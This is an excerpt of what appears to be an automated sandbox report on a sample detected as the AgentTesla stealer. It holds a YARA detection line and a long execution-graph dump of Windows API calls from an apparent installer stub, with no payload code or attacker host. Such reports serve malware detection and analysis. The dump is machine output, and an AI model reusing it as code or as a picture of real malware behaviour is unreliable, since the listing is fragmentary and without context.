                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:22.2%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:21.4%
                                        Total number of Nodes:1270
                                        Total number of Limit Nodes:27
                                        execution_graph 3553 402340 3554 402acb 17 API calls 3553->3554 3555 402351 3554->3555 3556 402acb 17 API calls 3555->3556 3557 40235a 3556->3557 3558 402acb 17 API calls 3557->3558 3559 402364 GetPrivateProfileStringA 3558->3559 3560 401d41 GetDlgItem GetClientRect 3561 402acb 17 API calls 3560->3561 3562 401d71 LoadImageA SendMessageA 3561->3562 3563 402957 3562->3563 3564 401d8f DeleteObject 3562->3564 3564->3563 3565 404a44 GetDlgItem GetDlgItem 3566 404a96 7 API calls 3565->3566 3580 404cae 3565->3580 3567 404b39 DeleteObject 3566->3567 3568 404b2c SendMessageA 3566->3568 3569 404b42 3567->3569 3568->3567 3571 404b79 3569->3571 3573 405fc2 17 API calls 3569->3573 3570 404d92 3572 404e3e 3570->3572 3576 404ca1 3570->3576 3582 404deb SendMessageA 3570->3582 3574 40403f 18 API calls 3571->3574 3577 404e50 3572->3577 3578 404e48 SendMessageA 3572->3578 3579 404b5b SendMessageA SendMessageA 3573->3579 3575 404b8d 3574->3575 3581 40403f 18 API calls 3575->3581 3583 4040a6 8 API calls 3576->3583 3589 404e62 ImageList_Destroy 3577->3589 3590 404e69 3577->3590 3594 404e79 3577->3594 3578->3577 3579->3569 3580->3570 3597 404d1f 3580->3597 3618 404992 SendMessageA 3580->3618 3598 404b9b 3581->3598 3582->3576 3587 404e00 SendMessageA 3582->3587 3588 405034 3583->3588 3584 404d84 SendMessageA 3584->3570 3586 404fe8 3586->3576 3595 404ffa ShowWindow GetDlgItem ShowWindow 3586->3595 3593 404e13 3587->3593 3589->3590 3591 404e72 GlobalFree 3590->3591 3590->3594 3591->3594 3592 404c6f GetWindowLongA SetWindowLongA 3596 404c88 3592->3596 3603 404e24 SendMessageA 3593->3603 3594->3586 3610 404eb4 3594->3610 3623 404a12 3594->3623 3595->3576 3599 404ca6 3596->3599 3600 404c8e ShowWindow 3596->3600 3597->3570 3597->3584 3598->3592 3602 404bea SendMessageA 3598->3602 3604 404c69 3598->3604 3607 404c26 SendMessageA 3598->3607 3608 404c37 SendMessageA 3598->3608 3617 404074 SendMessageA 3599->3617 3616 404074 SendMessageA 3600->3616 3602->3598 3603->3572 3604->3592 3604->3596 3605 404ef8 3611 404fbe InvalidateRect 3605->3611 3615 404f6c SendMessageA SendMessageA 3605->3615 3607->3598 3608->3598 3610->3605 3612 404ee2 SendMessageA 3610->3612 3611->3586 3613 404fd4 3611->3613 3612->3605 3632 40494d 3613->3632 3615->3605 3616->3576 3617->3580 3619 4049f1 SendMessageA 3618->3619 3620 4049b5 GetMessagePos ScreenToClient SendMessageA 3618->3620 3621 4049e9 3619->3621 3620->3621 3622 4049ee 3620->3622 3621->3597 3622->3619 3635 405fa0 lstrcpynA 3623->3635 3625 404a25 3636 405efe wsprintfA 3625->3636 3627 404a2f 3628 40140b 2 API calls 3627->3628 3629 404a38 3628->3629 3637 405fa0 lstrcpynA 3629->3637 3631 404a3f 3631->3610 3638 404888 3632->3638 3634 404962 3634->3586 3635->3625 3636->3627 3637->3631 3639 40489e 3638->3639 3640 405fc2 17 API calls 3639->3640 3641 404902 3640->3641 3642 405fc2 17 API calls 3641->3642 3643 40490d 3642->3643 3644 405fc2 17 API calls 3643->3644 3645 404923 lstrlenA wsprintfA SetDlgItemTextA 3644->3645 3645->3634 3646 401746 3647 402acb 17 API calls 3646->3647 3648 40174d 3647->3648 3649 405b68 2 API calls 3648->3649 3650 401754 3649->3650 3650->3650 3651 401947 3652 402acb 17 API calls 3651->3652 3653 40194e lstrlenA 3652->3653 3654 40257d 3653->3654 3658 4025ca 3659 402aa9 17 API calls 3658->3659 3665 4025d4 3659->3665 3660 402642 3661 405bb1 ReadFile 3661->3665 3662 402644 3667 405efe wsprintfA 3662->3667 3664 402654 3664->3660 3666 40266a SetFilePointer 3664->3666 3665->3660 3665->3661 3665->3662 3665->3664 3666->3660 3667->3660 3668 40224b 3669 402acb 17 API calls 3668->3669 3670 402251 3669->3670 3671 402acb 17 API calls 3670->3671 3672 40225a 3671->3672 3673 402acb 17 API calls 3672->3673 3674 402263 3673->3674 3675 4062a3 2 API calls 3674->3675 3676 40226c 3675->3676 3677 402270 3676->3677 3678 40227d lstrlenA lstrlenA 3676->3678 3679 4050c7 24 API calls 3677->3679 3680 4050c7 24 API calls 3678->3680 3682 402278 3679->3682 3681 4022b9 SHFileOperationA 3680->3681 3681->3677 3681->3682 3683 4028cb 3684 402aa9 17 API calls 3683->3684 3685 4028d1 3684->3685 3686 402906 3685->3686 3687 40271c 3685->3687 3689 4028e3 3685->3689 3686->3687 3688 405fc2 17 API calls 3686->3688 3688->3687 3689->3687 3691 405efe wsprintfA 3689->3691 3691->3687 3692 4022cd 3693 4022d4 3692->3693 3697 4022e7 3692->3697 3694 405fc2 17 API calls 3693->3694 3695 4022e1 3694->3695 3696 4056bc MessageBoxIndirectA 3695->3696 3696->3697 3698 4044d1 3699 4044fd 3698->3699 3700 40450e 3698->3700 3759 4056a0 GetDlgItemTextA 3699->3759 3702 40451a GetDlgItem 3700->3702 3706 404579 3700->3706 3705 40452e 3702->3705 3703 40465d 3757 404807 3703->3757 3761 4056a0 GetDlgItemTextA 3703->3761 3704 404508 3707 40620a 5 API calls 3704->3707 3708 404542 SetWindowTextA 3705->3708 3710 4059d1 4 API calls 3705->3710 3706->3703 3712 405fc2 17 API calls 3706->3712 3706->3757 3707->3700 3711 40403f 18 API calls 3708->3711 3716 404538 3710->3716 3717 40455e 3711->3717 3718 4045ed SHBrowseForFolderA 3712->3718 3713 40468d 3719 405a26 18 API calls 3713->3719 3714 4040a6 8 API calls 3715 40481b 3714->3715 3716->3708 3723 405938 3 API calls 3716->3723 3720 40403f 18 API calls 3717->3720 3718->3703 3721 404605 CoTaskMemFree 3718->3721 3722 404693 3719->3722 3724 40456c 3720->3724 3725 405938 3 API calls 3721->3725 3762 405fa0 lstrcpynA 3722->3762 3723->3708 3760 404074 SendMessageA 3724->3760 3727 404612 3725->3727 3730 404649 SetDlgItemTextA 3727->3730 3734 405fc2 17 API calls 3727->3734 3729 404572 3732 406338 5 API calls 3729->3732 3730->3703 3731 4046aa 3733 406338 5 API calls 3731->3733 3732->3706 3740 4046b1 3733->3740 3735 404631 lstrcmpiA 3734->3735 3735->3730 3738 404642 lstrcatA 3735->3738 3736 4046ed 3763 405fa0 lstrcpynA 3736->3763 3738->3730 3739 4046f4 3741 4059d1 4 API calls 3739->3741 3740->3736 3744 40597f 2 API calls 3740->3744 3746 404745 3740->3746 3742 4046fa GetDiskFreeSpaceA 3741->3742 3745 40471e MulDiv 3742->3745 3742->3746 3744->3740 3745->3746 3747 4047b6 3746->3747 3749 40494d 20 API calls 3746->3749 3748 4047d9 3747->3748 3750 40140b 2 API calls 3747->3750 3764 404061 KiUserCallbackDispatcher 3748->3764 3751 4047a3 3749->3751 3750->3748 3753 4047b8 SetDlgItemTextA 3751->3753 3754 4047a8 3751->3754 3753->3747 3756 404888 20 API calls 3754->3756 3755 4047f5 3755->3757 3765 40442a 3755->3765 3756->3747 3757->3714 3759->3704 3760->3729 3761->3713 3762->3731 3763->3739 3764->3755 3766 404438 3765->3766 3767 40443d SendMessageA 3765->3767 3766->3767 3767->3757 3768 4020d1 3769 402acb 17 API calls 3768->3769 3770 4020d8 3769->3770 3771 402acb 17 API calls 3770->3771 3772 4020e2 3771->3772 3773 402acb 17 API calls 3772->3773 3774 4020ec 3773->3774 3775 402acb 17 API calls 3774->3775 3776 4020f6 3775->3776 3777 402acb 17 API calls 3776->3777 3778 402100 3777->3778 3779 402142 CoCreateInstance 3778->3779 3780 402acb 17 API calls 3778->3780 3783 402161 3779->3783 3785 40220c 3779->3785 3780->3779 3781 401423 24 API calls 3782 402242 3781->3782 3784 4021ec MultiByteToWideChar 3783->3784 3783->3785 3784->3785 3785->3781 3785->3782 3786 4026d4 3787 4026da 3786->3787 3788 4026de FindNextFileA 3787->3788 3791 4026f0 3787->3791 3789 40272f 3788->3789 3788->3791 3792 405fa0 lstrcpynA 3789->3792 3792->3791 2960 4023d6 2961 402acb 17 API calls 2960->2961 2962 4023e8 2961->2962 2963 402acb 17 API calls 2962->2963 2964 4023f2 2963->2964 2977 402b5b 2964->2977 2967 402427 2969 402433 2967->2969 2981 402aa9 2967->2981 2968 402acb 17 API calls 2970 402420 lstrlenA 2968->2970 2972 402452 RegSetValueExA 2969->2972 2984 402f9c 2969->2984 2970->2967 2974 402468 RegCloseKey 2972->2974 2976 40271c 2974->2976 2978 402b76 2977->2978 3004 405e54 2978->3004 2982 405fc2 17 API calls 2981->2982 2983 402abe 2982->2983 2983->2969 2986 402fb2 2984->2986 2985 402fe0 3008 4031ae 2985->3008 2986->2985 3013 4031c4 SetFilePointer 2986->3013 2990 403147 2993 403189 2990->2993 2996 40314b 2990->2996 2991 402ffd GetTickCount 2992 403131 2991->2992 3000 40304c 2991->3000 2992->2972 2995 4031ae ReadFile 2993->2995 2994 4031ae ReadFile 2994->3000 2995->2992 2996->2992 2997 4031ae ReadFile 2996->2997 2998 405be0 WriteFile 2996->2998 2997->2996 2998->2996 2999 4030a2 GetTickCount 2999->3000 3000->2992 3000->2994 3000->2999 3001 4030c7 MulDiv wsprintfA 3000->3001 3011 405be0 WriteFile 3000->3011 3002 4050c7 24 API calls 3001->3002 3002->3000 3005 405e63 3004->3005 3006 402402 3005->3006 3007 405e6e RegCreateKeyExA 3005->3007 3006->2967 3006->2968 3006->2976 3007->3006 3014 405bb1 ReadFile 3008->3014 3012 405bfe 3011->3012 3012->3000 3013->2985 3015 402feb 3014->3015 3015->2990 3015->2991 3015->2992 3016 4014d6 3017 402aa9 17 API calls 3016->3017 3018 4014dc Sleep 3017->3018 3020 402957 3018->3020 3021 401759 3022 402acb 17 API calls 3021->3022 3023 401760 3022->3023 3024 401786 3023->3024 3025 40177e 3023->3025 3064 405fa0 lstrcpynA 3024->3064 3063 405fa0 lstrcpynA 3025->3063 3028 401784 3031 40620a 5 API calls 3028->3031 3029 401791 3065 405938 lstrlenA CharPrevA 3029->3065 3037 4017a3 3031->3037 3036 4017ba CompareFileTime 3036->3037 3037->3036 3038 40187e 3037->3038 3043 405fa0 lstrcpynA 3037->3043 3046 405fc2 17 API calls 3037->3046 3058 401855 3037->3058 3059 405b14 GetFileAttributesA 3037->3059 3062 405b39 GetFileAttributesA CreateFileA 3037->3062 3068 4062a3 FindFirstFileA 3037->3068 3071 4056bc 3037->3071 3039 4050c7 24 API calls 3038->3039 3040 401888 3039->3040 3042 402f9c 31 API calls 3040->3042 3041 4050c7 24 API calls 3049 40186a 3041->3049 3044 40189b 3042->3044 3043->3037 3045 4018af SetFileTime 3044->3045 3047 4018c1 CloseHandle 3044->3047 3045->3047 3046->3037 3048 4018d2 3047->3048 3047->3049 3050 4018d7 3048->3050 3051 4018ea 3048->3051 3052 405fc2 17 API calls 3050->3052 3053 405fc2 17 API calls 3051->3053 3056 4018df lstrcatA 3052->3056 3054 4018f2 3053->3054 3057 4056bc MessageBoxIndirectA 3054->3057 3056->3054 3057->3049 3058->3041 3058->3049 3060 405b33 3059->3060 3061 405b26 SetFileAttributesA 3059->3061 3060->3037 3061->3060 3062->3037 3063->3028 3064->3029 3066 405952 lstrcatA 3065->3066 3067 401797 lstrcatA 3065->3067 3066->3067 3067->3028 3069 4062c4 3068->3069 3070 4062b9 FindClose 3068->3070 3069->3037 3070->3069 3074 4056d1 3071->3074 3072 40571d 3072->3037 3073 4056e5 MessageBoxIndirectA 3073->3072 3074->3072 3074->3073 3793 401659 3794 402acb 17 API calls 3793->3794 3795 40165f 3794->3795 3796 4062a3 2 API calls 3795->3796 3797 401665 3796->3797 3798 401959 3799 402aa9 17 API calls 3798->3799 3800 401960 3799->3800 3801 402aa9 17 API calls 3800->3801 3802 40196d 3801->3802 3803 402acb 17 API calls 3802->3803 3804 401984 lstrlenA 3803->3804 3806 401994 3804->3806 3805 4019d4 3806->3805 3810 405fa0 lstrcpynA 3806->3810 3808 4019c4 3808->3805 3809 4019c9 lstrlenA 3808->3809 3809->3805 3810->3808 3811 401cda 3812 402aa9 17 API calls 3811->3812 3813 401ce0 IsWindow 3812->3813 3814 401a0e 3813->3814 3815 401a5e 3816 402aa9 17 API calls 3815->3816 3817 401a67 3816->3817 3818 402aa9 17 API calls 3817->3818 3819 401a0e 3818->3819 3820 401f61 3821 402acb 17 API calls 3820->3821 3822 401f68 3821->3822 3823 406338 5 API calls 3822->3823 3824 401f77 3823->3824 3825 401f8f GlobalAlloc 3824->3825 3834 401ff7 3824->3834 3826 401fa3 3825->3826 3825->3834 3827 406338 5 API calls 3826->3827 3828 401faa 3827->3828 3829 406338 5 API calls 3828->3829 3830 401fb4 3829->3830 3830->3834 3835 405efe wsprintfA 3830->3835 3832 401feb 3836 405efe wsprintfA 3832->3836 3835->3832 3836->3834 3837 402561 3838 402acb 17 API calls 3837->3838 3839 402568 3838->3839 3842 405b39 GetFileAttributesA CreateFileA 3839->3842 3841 402574 3842->3841 3843 401563 3844 4028ff 3843->3844 3847 405efe wsprintfA 3844->3847 3846 402904 3847->3846 3848 401b63 3849 401b70 3848->3849 3850 401bb4 3848->3850 3853 4022d4 3849->3853 3858 401b87 3849->3858 3851 401bb8 3850->3851 3852 401bdd GlobalAlloc 3850->3852 3861 401bf8 3851->3861 3869 405fa0 lstrcpynA 3851->3869 3854 405fc2 17 API calls 3852->3854 3855 405fc2 17 API calls 3853->3855 3854->3861 3857 4022e1 3855->3857 3862 4056bc MessageBoxIndirectA 3857->3862 3867 405fa0 lstrcpynA 3858->3867 3859 401bca GlobalFree 3859->3861 3862->3861 3863 401b96 3868 405fa0 lstrcpynA 3863->3868 3865 401ba5 3870 405fa0 lstrcpynA 3865->3870 3867->3863 3868->3865 3869->3859 3870->3861 3871 4024e5 3872 402b0b 17 API calls 3871->3872 3873 4024ef 3872->3873 3874 402aa9 17 API calls 3873->3874 3875 4024f8 3874->3875 3876 40271c 3875->3876 3877 402513 RegEnumKeyA 3875->3877 3878 40251f RegEnumValueA 3875->3878 3879 402534 RegCloseKey 3877->3879 3878->3879 3879->3876 3881 40166a 3882 402acb 17 API calls 3881->3882 3883 401671 3882->3883 3884 402acb 17 API calls 3883->3884 3885 40167a 3884->3885 3886 402acb 17 API calls 3885->3886 3887 401683 MoveFileA 3886->3887 3888 401696 3887->3888 3889 40168f 3887->3889 3891 4062a3 2 API calls 3888->3891 3893 402242 3888->3893 3890 401423 24 API calls 3889->3890 3890->3893 3892 4016a5 3891->3892 3892->3893 3894 405d7f 36 API calls 3892->3894 3894->3889 3075 403b6b 3076 403b83 3075->3076 3077 403cbe 3075->3077 3076->3077 3078 403b8f 3076->3078 3079 403d0f 3077->3079 3080 403ccf GetDlgItem GetDlgItem 3077->3080 3081 403b9a SetWindowPos 3078->3081 3082 403bad 3078->3082 3084 403d69 3079->3084 3089 401389 2 API calls 3079->3089 3083 40403f 18 API calls 3080->3083 3081->3082 3086 403bb2 ShowWindow 3082->3086 3087 403bca 3082->3087 3088 403cf9 SetClassLongA 3083->3088 3085 40408b SendMessageA 3084->3085 3090 403cb9 3084->3090 3116 403d7b 3085->3116 3086->3087 3091 403bd2 DestroyWindow 3087->3091 3092 403bec 3087->3092 3093 40140b 2 API calls 3088->3093 3094 403d41 3089->3094 3095 403fc8 3091->3095 3096 403bf1 SetWindowLongA 3092->3096 3097 403c02 3092->3097 3093->3079 3094->3084 3098 403d45 SendMessageA 3094->3098 3095->3090 3106 403ff9 ShowWindow 3095->3106 3096->3090 3101 403cab 3097->3101 3102 403c0e GetDlgItem 3097->3102 3098->3090 3099 40140b 2 API calls 3099->3116 3100 403fca DestroyWindow EndDialog 3100->3095 3105 4040a6 8 API calls 3101->3105 3103 403c21 SendMessageA IsWindowEnabled 3102->3103 3104 403c3e 3102->3104 3103->3090 3103->3104 3108 403c4b 3104->3108 3109 403c92 SendMessageA 3104->3109 3110 403c5e 3104->3110 3120 403c43 3104->3120 3105->3090 3106->3090 3107 405fc2 17 API calls 3107->3116 3108->3109 3108->3120 3109->3101 3113 403c66 3110->3113 3114 403c7b 3110->3114 3111 404018 SendMessageA 3115 403c79 3111->3115 3112 40403f 18 API calls 3112->3116 3152 40140b 3113->3152 3117 40140b 2 API calls 3114->3117 3115->3101 3116->3090 3116->3099 3116->3100 3116->3107 3116->3112 3121 40403f 18 API calls 3116->3121 3137 403f0a DestroyWindow 3116->3137 3119 403c82 3117->3119 3119->3101 3119->3120 3120->3111 3122 403df6 GetDlgItem 3121->3122 3123 403e13 ShowWindow KiUserCallbackDispatcher 3122->3123 3124 403e0b 3122->3124 3146 404061 KiUserCallbackDispatcher 3123->3146 3124->3123 3126 403e3d EnableWindow 3131 403e51 3126->3131 3127 403e56 GetSystemMenu EnableMenuItem SendMessageA 3128 403e86 SendMessageA 3127->3128 3127->3131 3128->3131 3131->3127 3147 404074 SendMessageA 3131->3147 3148 403b4c 3131->3148 3151 405fa0 lstrcpynA 3131->3151 3133 403eb5 lstrlenA 3134 405fc2 17 API calls 3133->3134 3135 403ec6 SetWindowTextA 3134->3135 3136 401389 2 API calls 3135->3136 3136->3116 3137->3095 3138 403f24 CreateDialogParamA 3137->3138 3138->3095 3139 403f57 3138->3139 3140 40403f 18 API calls 3139->3140 3141 403f62 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3140->3141 3142 401389 2 API calls 3141->3142 3143 403fa8 3142->3143 3143->3090 3144 403fb0 ShowWindow 3143->3144 3145 40408b SendMessageA 3144->3145 3145->3095 3146->3126 3147->3131 3149 405fc2 17 API calls 3148->3149 3150 403b5a SetWindowTextA 3149->3150 3150->3131 3151->3133 3153 401389 2 API calls 3152->3153 3154 401420 3153->3154 3154->3120 3895 4019ed 3896 402acb 17 API calls 3895->3896 3897 4019f4 3896->3897 3898 402acb 17 API calls 3897->3898 3899 4019fd 3898->3899 3900 401a04 lstrcmpiA 3899->3900 3901 401a16 lstrcmpA 3899->3901 3902 401a0a 3900->3902 3901->3902 3903 40156f 3904 401586 3903->3904 3905 40157f ShowWindow 3903->3905 3906 401594 ShowWindow 3904->3906 3907 402957 3904->3907 3905->3904 3906->3907 2801 402473 2812 402b0b 2801->2812 2806 402490 RegQueryValueExA 2807 4024b0 2806->2807 2808 4024b6 RegCloseKey 2806->2808 2807->2808 2823 405efe wsprintfA 2807->2823 2811 40271c 2808->2811 2813 402acb 17 API calls 2812->2813 2814 402b22 2813->2814 2824 405e26 2814->2824 2817 402acb 2818 402ad7 2817->2818 2828 405fc2 2818->2828 2821 402486 2821->2806 2821->2811 2823->2808 2825 405e35 2824->2825 2826 40247d 2825->2826 2827 405e3e RegOpenKeyExA 2825->2827 2826->2817 2827->2826 2840 405fcf 2828->2840 2829 4061f1 2830 402af8 2829->2830 2861 405fa0 lstrcpynA 2829->2861 2830->2821 2845 40620a 2830->2845 2832 4061cb lstrlenA 2832->2840 2835 405fc2 10 API calls 2835->2832 2836 4060e7 GetSystemDirectoryA 2836->2840 2838 4060fa GetWindowsDirectoryA 2838->2840 2839 40620a 5 API calls 2839->2840 2840->2829 2840->2832 2840->2835 2840->2836 2840->2838 2840->2839 2841 40612e SHGetSpecialFolderLocation 2840->2841 2842 405fc2 10 API calls 2840->2842 2843 406174 lstrcatA 2840->2843 2854 405e87 2840->2854 2859 405efe wsprintfA 2840->2859 2860 405fa0 lstrcpynA 2840->2860 2841->2840 2844 406146 SHGetPathFromIDListA CoTaskMemFree 2841->2844 2842->2840 2843->2840 2844->2840 2851 406216 2845->2851 2846 40627e 2847 406282 CharPrevA 2846->2847 2850 40629d 2846->2850 2847->2846 2848 406273 CharNextA 2848->2846 2848->2851 2850->2821 2851->2846 2851->2848 2852 406261 CharNextA 2851->2852 2853 40626e CharNextA 2851->2853 2862 405963 2851->2862 2852->2851 2853->2848 2855 405e26 RegOpenKeyExA 2854->2855 2856 405eb4 2855->2856 2857 405ebb RegQueryValueExA RegCloseKey 2856->2857 2858 405eea 2856->2858 2857->2858 2858->2840 2859->2840 2860->2840 2861->2830 2863 405969 2862->2863 2864 40597c 2863->2864 2865 40596f CharNextA 2863->2865 2864->2851 2865->2863 3908 4014f4 SetForegroundWindow 3909 402957 3908->3909 3910 404175 lstrcpynA lstrlenA 3911 401cfb 3912 402aa9 17 API calls 3911->3912 3913 401d02 3912->3913 3914 402aa9 17 API calls 3913->3914 3915 401d0e GetDlgItem 3914->3915 3916 40257d 3915->3916 3917 402c7c 3918 402c8b SetTimer 3917->3918 3920 402ca4 3917->3920 3918->3920 3919 402cf9 3920->3919 3921 402cbe MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3920->3921 3921->3919 3922 4022fc 3923 402304 3922->3923 3924 40230a 3922->3924 3925 402acb 17 API calls 3923->3925 3926 40231a 3924->3926 3927 402acb 17 API calls 3924->3927 3925->3924 3928 402acb 17 API calls 3926->3928 3931 402328 3926->3931 3927->3926 3928->3931 3929 402acb 17 API calls 3930 402331 WritePrivateProfileStringA 3929->3930 3931->3929 3932 4018fd 3933 401934 3932->3933 3934 402acb 17 API calls 3933->3934 3935 401939 3934->3935 3936 405768 67 API calls 3935->3936 3937 401942 3936->3937 3938 4026fe 3939 402acb 17 API calls 3938->3939 3940 402705 FindFirstFileA 3939->3940 3941 402728 3940->3941 3945 402718 3940->3945 3942 40272f 3941->3942 3946 405efe wsprintfA 3941->3946 3947 405fa0 lstrcpynA 3942->3947 3946->3942 3947->3945 3948 401000 3949 401037 BeginPaint GetClientRect 3948->3949 3950 40100c DefWindowProcA 3948->3950 3952 4010f3 3949->3952 3953 401179 3950->3953 3954 401073 CreateBrushIndirect FillRect DeleteObject 3952->3954 3955 4010fc 3952->3955 3954->3952 3956 401102 CreateFontIndirectA 3955->3956 3957 401167 EndPaint 3955->3957 3956->3957 3958 401112 6 API calls 3956->3958 3957->3953 3958->3957 3959 401900 3960 402acb 17 API calls 3959->3960 3961 401907 3960->3961 3962 4056bc MessageBoxIndirectA 3961->3962 3963 401910 3962->3963 3964 402381 3965 4023b3 3964->3965 3966 402388 3964->3966 3967 402acb 17 API calls 3965->3967 3968 402b0b 17 API calls 3966->3968 3969 4023ba 3967->3969 3970 40238f 3968->3970 3975 402b89 3969->3975 3972 4023c7 3970->3972 3973 402acb 17 API calls 3970->3973 3974 4023a0 RegDeleteValueA RegCloseKey 3973->3974 3974->3972 3976 402b95 3975->3976 3977 402b9c 3975->3977 3976->3972 3977->3976 3979 402bcd 3977->3979 3980 405e26 RegOpenKeyExA 3979->3980 3985 402bfb 3980->3985 3981 402c21 RegEnumKeyA 3982 402c38 RegCloseKey 3981->3982 3981->3985 3983 406338 5 API calls 3982->3983 3986 402c48 3983->3986 3984 402c59 RegCloseKey 3989 402c4c 3984->3989 3985->3981 3985->3982 3985->3984 3987 402bcd 6 API calls 3985->3987 3985->3989 3988 402c69 RegDeleteKeyA 3986->3988 3986->3989 3987->3985 3988->3989 3989->3976 3990 401502 3991 40150a 3990->3991 3993 40151d 3990->3993 3992 402aa9 17 API calls 3991->3992 3992->3993 3994 402003 3995 402015 3994->3995 3996 4020c3 3994->3996 3997 402acb 17 API calls 3995->3997 3998 401423 24 API calls 3996->3998 3999 40201c 3997->3999 4005 402242 3998->4005 4000 402acb 17 API calls 3999->4000 4001 402025 4000->4001 4002 40203a LoadLibraryExA 4001->4002 4003 40202d GetModuleHandleA 4001->4003 4002->3996 4004 40204a GetProcAddress 4002->4004 4003->4002 4003->4004 4006 402096 4004->4006 4007 402059 4004->4007 4008 4050c7 24 API calls 4006->4008 4009 401423 24 API calls 4007->4009 4010 402069 4007->4010 4008->4010 4009->4010 4010->4005 4011 4020b7 FreeLibrary 4010->4011 4011->4005 4012 402583 4013 402588 4012->4013 4014 40259c 4012->4014 4015 402aa9 17 API calls 4013->4015 4016 402acb 17 API calls 4014->4016 4018 402591 4015->4018 4017 4025a3 lstrlenA 4016->4017 4017->4018 4019 405be0 WriteFile 4018->4019 4020 4025c5 4018->4020 4019->4020 2866 405205 2867 4053b0 2866->2867 2868 405227 GetDlgItem GetDlgItem GetDlgItem 2866->2868 2869 4053e0 2867->2869 2870 4053b8 GetDlgItem CreateThread CloseHandle 2867->2870 2912 404074 SendMessageA 2868->2912 2873 40540e 2869->2873 2874 4053f6 ShowWindow ShowWindow 2869->2874 2875 40542f 2869->2875 2870->2869 2946 405199 OleInitialize 2870->2946 2872 405297 2878 40529e GetClientRect GetSystemMetrics SendMessageA SendMessageA 2872->2878 2876 405416 2873->2876 2877 405469 2873->2877 2917 404074 SendMessageA 2874->2917 2921 4040a6 2875->2921 2880 405442 ShowWindow 2876->2880 2881 40541e 2876->2881 2877->2875 2885 405476 SendMessageA 2877->2885 2883 4052f0 SendMessageA SendMessageA 2878->2883 2884 40530c 2878->2884 2888 405462 2880->2888 2889 405454 2880->2889 2918 404018 2881->2918 2883->2884 2891 405311 SendMessageA 2884->2891 2892 40531f 2884->2892 2887 40543b 2885->2887 2893 40548f CreatePopupMenu 2885->2893 2890 404018 SendMessageA 2888->2890 2935 4050c7 2889->2935 2890->2877 2891->2892 2913 40403f 2892->2913 2895 405fc2 17 API calls 2893->2895 2897 40549f AppendMenuA 2895->2897 2899 4054d0 TrackPopupMenu 2897->2899 2900 4054bd GetWindowRect 2897->2900 2898 40532f 2901 405338 ShowWindow 2898->2901 2902 40536c GetDlgItem SendMessageA 2898->2902 2899->2887 2903 4054ec 2899->2903 2900->2899 2904 40535b 2901->2904 2905 40534e ShowWindow 2901->2905 2902->2887 2906 405393 SendMessageA SendMessageA 2902->2906 2907 40550b SendMessageA 2903->2907 2916 404074 SendMessageA 2904->2916 2905->2904 2906->2887 2907->2907 2908 405528 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 2907->2908 2910 40554a SendMessageA 2908->2910 2910->2910 2911 40556c GlobalUnlock SetClipboardData CloseClipboard 2910->2911 2911->2887 2912->2872 2914 405fc2 17 API calls 2913->2914 2915 40404a SetDlgItemTextA 2914->2915 2915->2898 2916->2902 2917->2873 2919 404025 SendMessageA 2918->2919 2920 40401f 2918->2920 2919->2875 2920->2919 2922 404169 2921->2922 2923 4040be GetWindowLongA 2921->2923 2922->2887 2923->2922 2924 4040d3 2923->2924 2924->2922 2925 404100 GetSysColor 2924->2925 2926 404103 2924->2926 2925->2926 2927 404113 SetBkMode 2926->2927 2928 404109 SetTextColor 2926->2928 2929 404131 2927->2929 2930 40412b GetSysColor 2927->2930 2928->2927 2931 404138 SetBkColor 2929->2931 2932 404142 2929->2932 2930->2929 2931->2932 2932->2922 2933 404155 DeleteObject 2932->2933 2934 40415c CreateBrushIndirect 2932->2934 2933->2934 2934->2922 2936 4050e2 2935->2936 2945 405185 2935->2945 2937 4050ff lstrlenA 2936->2937 2938 405fc2 17 API calls 2936->2938 2939 405128 2937->2939 2940 40510d lstrlenA 2937->2940 2938->2937 2941 40513b 2939->2941 2942 40512e SetWindowTextA 2939->2942 2943 40511f lstrcatA 2940->2943 2940->2945 2944 405141 SendMessageA SendMessageA SendMessageA 2941->2944 2941->2945 2942->2941 2943->2939 2944->2945 2945->2888 2953 40408b 2946->2953 2948 4051bc 2952 4051e3 2948->2952 2956 401389 2948->2956 2949 40408b SendMessageA 2950 4051f5 OleUninitialize 2949->2950 2952->2949 2954 4040a3 2953->2954 2955 404094 SendMessageA 2953->2955 2954->2948 2955->2954 2958 401390 2956->2958 2957 4013fe 2957->2948 2958->2957 2959 4013cb MulDiv SendMessageA 2958->2959 2959->2958 4021 402688 4022 402904 4021->4022 4023 40268f 4021->4023 4024 402aa9 17 API calls 4023->4024 4025 402696 4024->4025 4026 4026a5 SetFilePointer 4025->4026 4026->4022 4027 4026b5 4026->4027 4029 405efe wsprintfA 4027->4029 4029->4022 4030 401c0a 4031 402aa9 17 API calls 4030->4031 4032 401c11 4031->4032 4033 402aa9 17 API calls 4032->4033 4034 401c1e 4033->4034 4035 401c33 4034->4035 4036 402acb 17 API calls 4034->4036 4037 402acb 17 API calls 4035->4037 4041 401c43 4035->4041 4036->4035 4037->4041 4038 401c9a 4040 402acb 17 API calls 4038->4040 4039 401c4e 4042 402aa9 17 API calls 4039->4042 4043 401c9f 4040->4043 4041->4038 4041->4039 4044 401c53 4042->4044 4045 402acb 17 API calls 4043->4045 4046 402aa9 17 API calls 4044->4046 4047 401ca8 FindWindowExA 4045->4047 4048 401c5f 4046->4048 4051 401cc6 4047->4051 4049 401c8a SendMessageA 4048->4049 4050 401c6c SendMessageTimeoutA 4048->4050 4049->4051 4050->4051 4052 40448a 4053 4044c0 4052->4053 4054 40449a 4052->4054 4056 4040a6 8 API calls 4053->4056 4055 40403f 18 API calls 4054->4055 4057 4044a7 SetDlgItemTextA 4055->4057 4058 4044cc 4056->4058 4057->4053 3205 40320c SetErrorMode GetVersion 3206 40324d 3205->3206 3207 403253 3205->3207 3208 406338 5 API calls 3206->3208 3209 4062ca 3 API calls 3207->3209 3208->3207 3210 403269 lstrlenA 3209->3210 3210->3207 3211 403278 3210->3211 3212 406338 5 API calls 3211->3212 3213 40327f 3212->3213 3214 406338 5 API calls 3213->3214 3215 403286 3214->3215 3216 406338 5 API calls 3215->3216 3217 403292 #17 OleInitialize SHGetFileInfoA 3216->3217 3295 405fa0 lstrcpynA 3217->3295 3220 4032de GetCommandLineA 3296 405fa0 lstrcpynA 